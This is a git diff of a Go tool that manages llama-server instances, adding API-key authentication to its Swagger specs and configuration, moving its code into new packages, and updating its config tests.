||||
}
|
||||
],
|
||||
"description": "Returns the help text for the llama server command",
|
||||
"tags": [
|
||||
"server"
|
||||
@@ -491,6 +556,11 @@
|
||||
},
|
||||
"/server/version": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns the version of the llama server command",
|
||||
"tags": [
|
||||
"server"
|
||||
@@ -514,7 +584,12 @@
|
||||
},
|
||||
"/v1/": {
|
||||
"post": {
|
||||
"description": "Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body",
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body. Requires API key authentication via the `Authorization` header.",
|
||||
"consumes": [
|
||||
"application/json"
|
||||
],
|
||||
@@ -543,6 +618,11 @@
|
||||
},
|
||||
"/v1/models": {
|
||||
"get": {
|
||||
"security": [
|
||||
{
|
||||
"ApiKeyAuth": []
|
||||
}
|
||||
],
|
||||
"description": "Returns a list of instances in a format compatible with OpenAI API",
|
||||
"tags": [
|
||||
"openai"
|
||||
|
||||
@@ -399,6 +399,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: List all instances
|
||||
tags:
|
||||
- instances
|
||||
@@ -422,6 +424,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Delete an instance
|
||||
tags:
|
||||
- instances
|
||||
@@ -446,6 +450,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Get details of a specific instance
|
||||
tags:
|
||||
- instances
|
||||
@@ -478,6 +484,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Create and start a new instance
|
||||
tags:
|
||||
- instances
|
||||
@@ -510,6 +518,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Update an instance's configuration
|
||||
tags:
|
||||
- instances
|
||||
@@ -540,6 +550,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Get logs from a specific instance
|
||||
tags:
|
||||
- instances
|
||||
@@ -568,6 +580,8 @@ paths:
|
||||
description: Instance is not running
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Proxy requests to a specific instance
|
||||
tags:
|
||||
- instances
|
||||
@@ -595,6 +609,8 @@ paths:
|
||||
description: Instance is not running
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Proxy requests to a specific instance
|
||||
tags:
|
||||
- instances
|
||||
@@ -620,6 +636,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Restart a running instance
|
||||
tags:
|
||||
- instances
|
||||
@@ -645,6 +663,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Start a stopped instance
|
||||
tags:
|
||||
- instances
|
||||
@@ -670,6 +690,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Stop a running instance
|
||||
tags:
|
||||
- instances
|
||||
@@ -685,6 +707,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: List available devices for llama server
|
||||
tags:
|
||||
- server
|
||||
@@ -700,6 +724,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Get help for llama server
|
||||
tags:
|
||||
- server
|
||||
@@ -715,6 +741,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: Get version of llama server
|
||||
tags:
|
||||
- server
|
||||
@@ -723,7 +751,8 @@ paths:
|
||||
consumes:
|
||||
- application/json
|
||||
description: Handles all POST requests to /v1/*, routing to the appropriate
|
||||
instance based on the request body
|
||||
instance based on the request body. Requires API key authentication via the
|
||||
`Authorization` header.
|
||||
responses:
|
||||
"200":
|
||||
description: OpenAI response
|
||||
@@ -735,6 +764,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: OpenAI-compatible proxy endpoint
|
||||
tags:
|
||||
- openai
|
||||
@@ -751,6 +782,8 @@ paths:
|
||||
description: Internal Server Error
|
||||
schema:
|
||||
type: string
|
||||
security:
|
||||
- ApiKeyAuth: []
|
||||
summary: List instances in OpenAI-compatible format
|
||||
tags:
|
||||
- openai
|
||||
|
||||
@@ -1,4 +1,4 @@
|
||||
package llamactl
|
||||
package llamacpp
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
@@ -1,17 +1,16 @@
|
||||
package llamactl_test
|
||||
package llamacpp_test
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"reflect"
|
||||
"slices"
|
||||
"testing"
|
||||
|
||||
llamactl "llamactl/pkg"
|
||||
)
|
||||
|
||||
func TestBuildCommandArgs_BasicFields(t *testing.T) {
|
||||
options := llamactl.LlamaServerOptions{
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
Host: "localhost",
|
||||
@@ -46,27 +45,27 @@ func TestBuildCommandArgs_BasicFields(t *testing.T) {
|
||||
func TestBuildCommandArgs_BooleanFields(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
options llamactl.LlamaServerOptions
|
||||
options llamacpp.LlamaServerOptions
|
||||
expected []string
|
||||
excluded []string
|
||||
}{
|
||||
{
|
||||
name: "verbose true",
|
||||
options: llamactl.LlamaServerOptions{
|
||||
options: llamacpp.LlamaServerOptions{
|
||||
Verbose: true,
|
||||
},
|
||||
expected: []string{"--verbose"},
|
||||
},
|
||||
{
|
||||
name: "verbose false",
|
||||
options: llamactl.LlamaServerOptions{
|
||||
options: llamacpp.LlamaServerOptions{
|
||||
Verbose: false,
|
||||
},
|
||||
excluded: []string{"--verbose"},
|
||||
},
|
||||
{
|
||||
name: "multiple booleans",
|
||||
options: llamactl.LlamaServerOptions{
|
||||
options: llamacpp.LlamaServerOptions{
|
||||
Verbose: true,
|
||||
FlashAttn: true,
|
||||
Mlock: false,
|
||||
@@ -97,7 +96,7 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs_NumericFields(t *testing.T) {
|
||||
options := llamactl.LlamaServerOptions{
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
Port: 8080,
|
||||
Threads: 4,
|
||||
CtxSize: 2048,
|
||||
@@ -127,7 +126,7 @@ func TestBuildCommandArgs_NumericFields(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs_ZeroValues(t *testing.T) {
|
||||
options := llamactl.LlamaServerOptions{
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
Port: 0, // Should be excluded
|
||||
Threads: 0, // Should be excluded
|
||||
Temperature: 0, // Should be excluded
|
||||
@@ -154,7 +153,7 @@ func TestBuildCommandArgs_ZeroValues(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs_ArrayFields(t *testing.T) {
|
||||
options := llamactl.LlamaServerOptions{
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
Lora: []string{"adapter1.bin", "adapter2.bin"},
|
||||
OverrideTensor: []string{"tensor1", "tensor2", "tensor3"},
|
||||
DrySequenceBreaker: []string{".", "!", "?"},
|
||||
@@ -179,7 +178,7 @@ func TestBuildCommandArgs_ArrayFields(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
|
||||
options := llamactl.LlamaServerOptions{
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
Lora: []string{}, // Empty array should not generate args
|
||||
OverrideTensor: []string{}, // Empty array should not generate args
|
||||
}
|
||||
@@ -196,7 +195,7 @@ func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
|
||||
|
||||
func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
|
||||
// Test snake_case to kebab-case conversion
|
||||
options := llamactl.LlamaServerOptions{
|
||||
options := llamacpp.LlamaServerOptions{
|
||||
CtxSize: 4096,
|
||||
GPULayers: 32,
|
||||
ThreadsBatch: 2,
|
||||
@@ -235,7 +234,7 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
|
||||
"temperature": 0.7
|
||||
}`
|
||||
|
||||
var options llamactl.LlamaServerOptions
|
||||
var options llamacpp.LlamaServerOptions
|
||||
err := json.Unmarshal([]byte(jsonData), &options)
|
||||
if err != nil {
|
||||
t.Fatalf("Unmarshal failed: %v", err)
|
||||
@@ -268,12 +267,12 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
jsonData string
|
||||
checkFn func(llamactl.LlamaServerOptions) error
|
||||
checkFn func(llamacpp.LlamaServerOptions) error
|
||||
}{
|
||||
{
|
||||
name: "threads alternatives",
|
||||
jsonData: `{"t": 4, "tb": 2}`,
|
||||
checkFn: func(opts llamactl.LlamaServerOptions) error {
|
||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||
if opts.Threads != 4 {
|
||||
return fmt.Errorf("expected threads 4, got %d", opts.Threads)
|
||||
}
|
||||
@@ -286,7 +285,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
{
|
||||
name: "context size alternatives",
|
||||
jsonData: `{"c": 2048}`,
|
||||
checkFn: func(opts llamactl.LlamaServerOptions) error {
|
||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||
if opts.CtxSize != 2048 {
|
||||
return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
|
||||
}
|
||||
@@ -296,7 +295,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
{
|
||||
name: "gpu layers alternatives",
|
||||
jsonData: `{"ngl": 16}`,
|
||||
checkFn: func(opts llamactl.LlamaServerOptions) error {
|
||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||
if opts.GPULayers != 16 {
|
||||
return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
|
||||
}
|
||||
@@ -306,7 +305,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
{
|
||||
name: "model alternatives",
|
||||
jsonData: `{"m": "/path/model.gguf"}`,
|
||||
checkFn: func(opts llamactl.LlamaServerOptions) error {
|
||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||
if opts.Model != "/path/model.gguf" {
|
||||
return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
|
||||
}
|
||||
@@ -316,7 +315,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
{
|
||||
name: "temperature alternatives",
|
||||
jsonData: `{"temp": 0.8}`,
|
||||
checkFn: func(opts llamactl.LlamaServerOptions) error {
|
||||
checkFn: func(opts llamacpp.LlamaServerOptions) error {
|
||||
if opts.Temperature != 0.8 {
|
||||
return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
|
||||
}
|
||||
@@ -327,7 +326,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
var options llamactl.LlamaServerOptions
|
||||
var options llamacpp.LlamaServerOptions
|
||||
err := json.Unmarshal([]byte(tt.jsonData), &options)
|
||||
if err != nil {
|
||||
t.Fatalf("Unmarshal failed: %v", err)
|
||||
@@ -343,7 +342,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
|
||||
func TestUnmarshalJSON_InvalidJSON(t *testing.T) {
|
||||
invalidJSON := `{"port": "not-a-number", "invalid": syntax}`
|
||||
|
||||
var options llamactl.LlamaServerOptions
|
||||
var options llamacpp.LlamaServerOptions
|
||||
err := json.Unmarshal([]byte(invalidJSON), &options)
|
||||
if err == nil {
|
||||
t.Error("Expected error for invalid JSON")
|
||||
@@ -357,7 +356,7 @@ func TestUnmarshalJSON_ArrayFields(t *testing.T) {
|
||||
"dry_sequence_breaker": [".", "!", "?"]
|
||||
}`
|
||||
|
||||
var options llamactl.LlamaServerOptions
|
||||
var options llamacpp.LlamaServerOptions
|
||||
err := json.Unmarshal([]byte(jsonData), &options)
|
||||
if err != nil {
|
||||
t.Fatalf("Unmarshal failed: %v", err)
|
||||
@@ -1,4 +1,4 @@
|
||||
package llamactl
|
||||
package config
|
||||
|
||||
import (
|
||||
"os"
|
||||
@@ -10,10 +10,11 @@ import (
|
||||
"gopkg.in/yaml.v3"
|
||||
)
|
||||
|
||||
// Config represents the configuration for llamactl
|
||||
type Config struct {
|
||||
// AppConfig represents the configuration for llamactl
|
||||
type AppConfig struct {
|
||||
Server ServerConfig `yaml:"server"`
|
||||
Instances InstancesConfig `yaml:"instances"`
|
||||
Auth AuthConfig `yaml:"auth"`
|
||||
}
|
||||
|
||||
// ServerConfig contains HTTP server configuration
|
||||
@@ -26,6 +27,9 @@ type ServerConfig struct {
|
||||
|
||||
// Allowed origins for CORS (e.g., "http://localhost:3000")
|
||||
AllowedOrigins []string `yaml:"allowed_origins"`
|
||||
|
||||
// Enable Swagger UI for API documentation
|
||||
EnableSwagger bool `yaml:"enable_swagger"`
|
||||
}
|
||||
|
||||
// InstancesConfig contains instance management configuration
|
||||
@@ -33,8 +37,17 @@ type InstancesConfig struct {
|
||||
// Port range for instances (e.g., 8000,9000)
|
||||
PortRange [2]int `yaml:"port_range"`
|
||||
|
||||
// Directory where instance logs will be stored
|
||||
LogDirectory string `yaml:"log_directory"`
|
||||
// Directory where all llamactl data will be stored (instances.json, logs, etc.)
|
||||
DataDir string `yaml:"data_dir"`
|
||||
|
||||
// Instance config directory override
|
||||
InstancesDir string `yaml:"configs_dir"`
|
||||
|
||||
// Logs directory override
|
||||
LogsDir string `yaml:"logs_dir"`
|
||||
|
||||
// Automatically create the data directory if it doesn't exist
|
||||
AutoCreateDirs bool `yaml:"auto_create_dirs"`
|
||||
|
||||
// Maximum number of instances that can be created
|
||||
MaxInstances int `yaml:"max_instances"`
|
||||
@@ -52,27 +65,53 @@ type InstancesConfig struct {
|
||||
DefaultRestartDelay int `yaml:"default_restart_delay"`
|
||||
}
|
||||
|
||||
// AuthConfig contains authentication settings
|
||||
type AuthConfig struct {
|
||||
|
||||
// Require authentication for OpenAI compatible inference endpoints
|
||||
RequireInferenceAuth bool `yaml:"require_inference_auth"`
|
||||
|
||||
// List of keys for OpenAI compatible inference endpoints
|
||||
InferenceKeys []string `yaml:"inference_keys"`
|
||||
|
||||
// Require authentication for management endpoints
|
||||
RequireManagementAuth bool `yaml:"require_management_auth"`
|
||||
|
||||
// List of keys for management endpoints
|
||||
ManagementKeys []string `yaml:"management_keys"`
|
||||
}
|
||||
|
||||
// LoadConfig loads configuration with the following precedence:
|
||||
// 1. Hardcoded defaults
|
||||
// 2. Config file
|
||||
// 3. Environment variables
|
||||
func LoadConfig(configPath string) (Config, error) {
|
||||
func LoadConfig(configPath string) (AppConfig, error) {
|
||||
// 1. Start with defaults
|
||||
cfg := Config{
|
||||
cfg := AppConfig{
|
||||
Server: ServerConfig{
|
||||
Host: "0.0.0.0",
|
||||
Port: 8080,
|
||||
AllowedOrigins: []string{"*"}, // Default to allow all origins
|
||||
EnableSwagger: false,
|
||||
},
|
||||
Instances: InstancesConfig{
|
||||
PortRange: [2]int{8000, 9000},
|
||||
LogDirectory: "/tmp/llamactl",
|
||||
DataDir: getDefaultDataDirectory(),
|
||||
InstancesDir: filepath.Join(getDefaultDataDirectory(), "instances"),
|
||||
LogsDir: filepath.Join(getDefaultDataDirectory(), "logs"),
|
||||
AutoCreateDirs: true,
|
||||
MaxInstances: -1, // -1 means unlimited
|
||||
LlamaExecutable: "llama-server",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
},
|
||||
Auth: AuthConfig{
|
||||
RequireInferenceAuth: true,
|
||||
InferenceKeys: []string{},
|
||||
RequireManagementAuth: true,
|
||||
ManagementKeys: []string{},
|
||||
},
|
||||
}
|
||||
|
||||
// 2. Load from config file
|
||||
@@ -87,7 +126,7 @@ func LoadConfig(configPath string) (Config, error) {
|
||||
}
|
||||
|
||||
// loadConfigFile attempts to load config from file with fallback locations
|
||||
func loadConfigFile(cfg *Config, configPath string) error {
|
||||
func loadConfigFile(cfg *AppConfig, configPath string) error {
|
||||
var configLocations []string
|
||||
|
||||
// If specific config path provided, use only that
|
||||
@@ -111,7 +150,7 @@ func loadConfigFile(cfg *Config, configPath string) error {
|
||||
}
|
||||
|
||||
// loadEnvVars overrides config with environment variables
|
||||
func loadEnvVars(cfg *Config) {
|
||||
func loadEnvVars(cfg *AppConfig) {
|
||||
// Server config
|
||||
if host := os.Getenv("LLAMACTL_HOST"); host != "" {
|
||||
cfg.Server.Host = host
|
||||
@@ -121,6 +160,30 @@ func loadEnvVars(cfg *Config) {
|
||||
cfg.Server.Port = p
|
||||
}
|
||||
}
|
||||
if allowedOrigins := os.Getenv("LLAMACTL_ALLOWED_ORIGINS"); allowedOrigins != "" {
|
||||
cfg.Server.AllowedOrigins = strings.Split(allowedOrigins, ",")
|
||||
}
|
||||
if enableSwagger := os.Getenv("LLAMACTL_ENABLE_SWAGGER"); enableSwagger != "" {
|
||||
if b, err := strconv.ParseBool(enableSwagger); err == nil {
|
||||
cfg.Server.EnableSwagger = b
|
||||
}
|
||||
}
|
||||
|
||||
// Data config
|
||||
if dataDir := os.Getenv("LLAMACTL_DATA_DIRECTORY"); dataDir != "" {
|
||||
cfg.Instances.DataDir = dataDir
|
||||
}
|
||||
if instancesDir := os.Getenv("LLAMACTL_INSTANCES_DIR"); instancesDir != "" {
|
||||
cfg.Instances.InstancesDir = instancesDir
|
||||
}
|
||||
if logsDir := os.Getenv("LLAMACTL_LOGS_DIR"); logsDir != "" {
|
||||
cfg.Instances.LogsDir = logsDir
|
||||
}
|
||||
if autoCreate := os.Getenv("LLAMACTL_AUTO_CREATE_DATA_DIR"); autoCreate != "" {
|
||||
if b, err := strconv.ParseBool(autoCreate); err == nil {
|
||||
cfg.Instances.AutoCreateDirs = b
|
||||
}
|
||||
}
|
||||
|
||||
// Instance config
|
||||
if portRange := os.Getenv("LLAMACTL_INSTANCE_PORT_RANGE"); portRange != "" {
|
||||
@@ -128,9 +191,6 @@ func loadEnvVars(cfg *Config) {
|
||||
cfg.Instances.PortRange = ports
|
||||
}
|
||||
}
|
||||
if logDir := os.Getenv("LLAMACTL_LOG_DIR"); logDir != "" {
|
||||
cfg.Instances.LogDirectory = logDir
|
||||
}
|
||||
if maxInstances := os.Getenv("LLAMACTL_MAX_INSTANCES"); maxInstances != "" {
|
||||
if m, err := strconv.Atoi(maxInstances); err == nil {
|
||||
cfg.Instances.MaxInstances = m
|
||||
@@ -154,6 +214,23 @@ func loadEnvVars(cfg *Config) {
|
||||
cfg.Instances.DefaultRestartDelay = seconds
|
||||
}
|
||||
}
|
||||
// Auth config
|
||||
if requireInferenceAuth := os.Getenv("LLAMACTL_REQUIRE_INFERENCE_AUTH"); requireInferenceAuth != "" {
|
||||
if b, err := strconv.ParseBool(requireInferenceAuth); err == nil {
|
||||
cfg.Auth.RequireInferenceAuth = b
|
||||
}
|
||||
}
|
||||
if inferenceKeys := os.Getenv("LLAMACTL_INFERENCE_KEYS"); inferenceKeys != "" {
|
||||
cfg.Auth.InferenceKeys = strings.Split(inferenceKeys, ",")
|
||||
}
|
||||
if requireManagementAuth := os.Getenv("LLAMACTL_REQUIRE_MANAGEMENT_AUTH"); requireManagementAuth != "" {
|
||||
if b, err := strconv.ParseBool(requireManagementAuth); err == nil {
|
||||
cfg.Auth.RequireManagementAuth = b
|
||||
}
|
||||
}
|
||||
if managementKeys := os.Getenv("LLAMACTL_MANAGEMENT_KEYS"); managementKeys != "" {
|
||||
cfg.Auth.ManagementKeys = strings.Split(managementKeys, ",")
|
||||
}
|
||||
}
|
||||
|
||||
// ParsePortRange parses port range from string formats like "8000-9000" or "8000,9000"
|
||||
@@ -179,64 +256,63 @@ func ParsePortRange(s string) [2]int {
|
||||
return [2]int{0, 0} // Invalid format
|
||||
}
|
||||
|
||||
// getDefaultDataDirectory returns platform-specific default data directory
|
||||
func getDefaultDataDirectory() string {
|
||||
switch runtime.GOOS {
|
||||
case "windows":
|
||||
// Try PROGRAMDATA first (system-wide), fallback to LOCALAPPDATA (user)
|
||||
if programData := os.Getenv("PROGRAMDATA"); programData != "" {
|
||||
return filepath.Join(programData, "llamactl")
|
||||
}
|
||||
if localAppData := os.Getenv("LOCALAPPDATA"); localAppData != "" {
|
||||
return filepath.Join(localAppData, "llamactl")
|
||||
}
|
||||
return "C:\\ProgramData\\llamactl" // Final fallback
|
||||
|
||||
case "darwin":
|
||||
// For macOS, use user's Application Support directory
|
||||
if homeDir, _ := os.UserHomeDir(); homeDir != "" {
|
||||
return filepath.Join(homeDir, "Library", "Application Support", "llamactl")
|
||||
}
|
||||
return "/usr/local/var/llamactl" // Fallback
|
||||
|
||||
default:
|
||||
// Linux and other Unix-like systems
|
||||
if homeDir, _ := os.UserHomeDir(); homeDir != "" {
|
||||
return filepath.Join(homeDir, ".local", "share", "llamactl")
|
||||
}
|
||||
return "/var/lib/llamactl" // Final fallback
|
||||
}
|
||||
}
|
||||
|
||||
// getDefaultConfigLocations returns platform-specific config file locations
|
||||
func getDefaultConfigLocations() []string {
|
||||
var locations []string
|
||||
|
||||
// Current directory (cross-platform)
|
||||
locations = append(locations,
|
||||
"./llamactl.yaml",
|
||||
"./config.yaml",
|
||||
)
|
||||
|
||||
homeDir, _ := os.UserHomeDir()
|
||||
|
||||
switch runtime.GOOS {
|
||||
case "windows":
|
||||
// Windows: Use APPDATA and ProgramData
|
||||
// Windows: Use APPDATA if available, else user home, fallback to ProgramData
|
||||
if appData := os.Getenv("APPDATA"); appData != "" {
|
||||
locations = append(locations, filepath.Join(appData, "llamactl", "config.yaml"))
|
||||
}
|
||||
if programData := os.Getenv("PROGRAMDATA"); programData != "" {
|
||||
locations = append(locations, filepath.Join(programData, "llamactl", "config.yaml"))
|
||||
}
|
||||
// Fallback to user home
|
||||
if homeDir != "" {
|
||||
} else if homeDir != "" {
|
||||
locations = append(locations, filepath.Join(homeDir, "llamactl", "config.yaml"))
|
||||
}
|
||||
locations = append(locations, filepath.Join(os.Getenv("PROGRAMDATA"), "llamactl", "config.yaml"))
|
||||
|
||||
case "darwin":
|
||||
// macOS: Use proper Application Support directories
|
||||
// macOS: Use Application Support in user home, fallback to /Library/Application Support
|
||||
if homeDir != "" {
|
||||
locations = append(locations,
|
||||
filepath.Join(homeDir, "Library", "Application Support", "llamactl", "config.yaml"),
|
||||
filepath.Join(homeDir, ".config", "llamactl", "config.yaml"), // XDG fallback
|
||||
)
|
||||
locations = append(locations, filepath.Join(homeDir, "Library", "Application Support", "llamactl", "config.yaml"))
|
||||
}
|
||||
locations = append(locations, "/Library/Application Support/llamactl/config.yaml")
|
||||
locations = append(locations, "/etc/llamactl/config.yaml") // Unix fallback
|
||||
|
||||
default:
|
||||
// User config: $XDG_CONFIG_HOME/llamactl/config.yaml or ~/.config/llamactl/config.yaml
|
||||
configHome := os.Getenv("XDG_CONFIG_HOME")
|
||||
if configHome == "" && homeDir != "" {
|
||||
configHome = filepath.Join(homeDir, ".config")
|
||||
// Linux/Unix: Use ~/.config/llamactl/config.yaml, fallback to /etc/llamactl/config.yaml
|
||||
if homeDir != "" {
|
||||
locations = append(locations, filepath.Join(homeDir, ".config", "llamactl", "config.yaml"))
|
||||
}
|
||||
if configHome != "" {
|
||||
locations = append(locations, filepath.Join(configHome, "llamactl", "config.yaml"))
|
||||
}
|
||||
|
||||
// System config: /etc/llamactl/config.yaml
|
||||
locations = append(locations, "/etc/llamactl/config.yaml")
|
||||
|
||||
// Additional system locations
|
||||
if xdgConfigDirs := os.Getenv("XDG_CONFIG_DIRS"); xdgConfigDirs != "" {
|
||||
for dir := range strings.SplitSeq(xdgConfigDirs, ":") {
|
||||
if dir != "" {
|
||||
locations = append(locations, filepath.Join(dir, "llamactl", "config.yaml"))
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return locations
|
||||
@@ -1,16 +1,15 @@
|
||||
package llamactl_test
|
||||
package config_test
|
||||
|
||||
import (
|
||||
"llamactl/pkg/config"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"testing"
|
||||
|
||||
llamactl "llamactl/pkg"
|
||||
)
|
||||
|
||||
func TestLoadConfig_Defaults(t *testing.T) {
|
||||
// Test loading config when no file exists and no env vars set
|
||||
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
|
||||
cfg, err := config.LoadConfig("nonexistent-file.yaml")
|
||||
if err != nil {
|
||||
t.Fatalf("LoadConfig should not error with defaults: %v", err)
|
||||
}
|
||||
@@ -22,12 +21,24 @@ func TestLoadConfig_Defaults(t *testing.T) {
|
||||
if cfg.Server.Port != 8080 {
|
||||
t.Errorf("Expected default port to be 8080, got %d", cfg.Server.Port)
|
||||
}
|
||||
|
||||
homedir, err := os.UserHomeDir()
|
||||
if err != nil {
|
||||
t.Fatalf("Failed to get user home directory: %v", err)
|
||||
}
|
||||
|
||||
if cfg.Instances.InstancesDir != filepath.Join(homedir, ".local", "share", "llamactl", "instances") {
|
||||
t.Errorf("Expected default instances directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "instances"), cfg.Instances.InstancesDir)
|
||||
}
|
||||
if cfg.Instances.LogsDir != filepath.Join(homedir, ".local", "share", "llamactl", "logs") {
|
||||
t.Errorf("Expected default logs directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "logs"), cfg.Instances.LogsDir)
|
||||
}
|
||||
if !cfg.Instances.AutoCreateDirs {
|
||||
t.Error("Expected default instances auto-create to be true")
|
||||
}
|
||||
if cfg.Instances.PortRange != [2]int{8000, 9000} {
|
||||
t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange)
|
||||
}
|
||||
if cfg.Instances.LogDirectory != "/tmp/llamactl" {
|
||||
t.Errorf("Expected default log directory '/tmp/llamactl', got %q", cfg.Instances.LogDirectory)
|
||||
}
|
||||
if cfg.Instances.MaxInstances != -1 {
|
||||
t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
|
||||
}
|
||||
@@ -56,7 +67,7 @@ server:
|
||||
port: 9090
|
||||
instances:
|
||||
port_range: [7000, 8000]
|
||||
log_directory: "/custom/logs"
|
||||
logs_dir: "/custom/logs"
|
||||
max_instances: 5
|
||||
llama_executable: "/usr/bin/llama-server"
|
||||
default_auto_restart: false
|
||||
@@ -69,7 +80,7 @@ instances:
|
||||
t.Fatalf("Failed to write test config file: %v", err)
|
||||
}
|
||||
|
||||
cfg, err := llamactl.LoadConfig(configFile)
|
||||
cfg, err := config.LoadConfig(configFile)
|
||||
if err != nil {
|
||||
t.Fatalf("LoadConfig failed: %v", err)
|
||||
}
|
||||
@@ -84,8 +95,8 @@ instances:
|
||||
if cfg.Instances.PortRange != [2]int{7000, 8000} {
|
||||
t.Errorf("Expected port range [7000, 8000], got %v", cfg.Instances.PortRange)
|
||||
}
|
||||
if cfg.Instances.LogDirectory != "/custom/logs" {
|
||||
t.Errorf("Expected log directory '/custom/logs', got %q", cfg.Instances.LogDirectory)
|
||||
if cfg.Instances.LogsDir != "/custom/logs" {
|
||||
t.Errorf("Expected logs directory '/custom/logs', got %q", cfg.Instances.LogsDir)
|
||||
}
|
||||
if cfg.Instances.MaxInstances != 5 {
|
||||
t.Errorf("Expected max instances 5, got %d", cfg.Instances.MaxInstances)
|
||||
@@ -110,7 +121,7 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
|
||||
"LLAMACTL_HOST": "0.0.0.0",
|
||||
"LLAMACTL_PORT": "3000",
|
||||
"LLAMACTL_INSTANCE_PORT_RANGE": "5000-6000",
|
||||
"LLAMACTL_LOG_DIR": "/env/logs",
|
||||
"LLAMACTL_LOGS_DIR": "/env/logs",
|
||||
"LLAMACTL_MAX_INSTANCES": "20",
|
||||
"LLAMACTL_LLAMA_EXECUTABLE": "/env/llama-server",
|
||||
"LLAMACTL_DEFAULT_AUTO_RESTART": "false",
|
||||
@@ -124,7 +135,7 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
|
||||
defer os.Unsetenv(key)
|
||||
}
|
||||
|
||||
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
|
||||
cfg, err := config.LoadConfig("nonexistent-file.yaml")
|
||||
if err != nil {
|
||||
t.Fatalf("LoadConfig failed: %v", err)
|
||||
}
|
||||
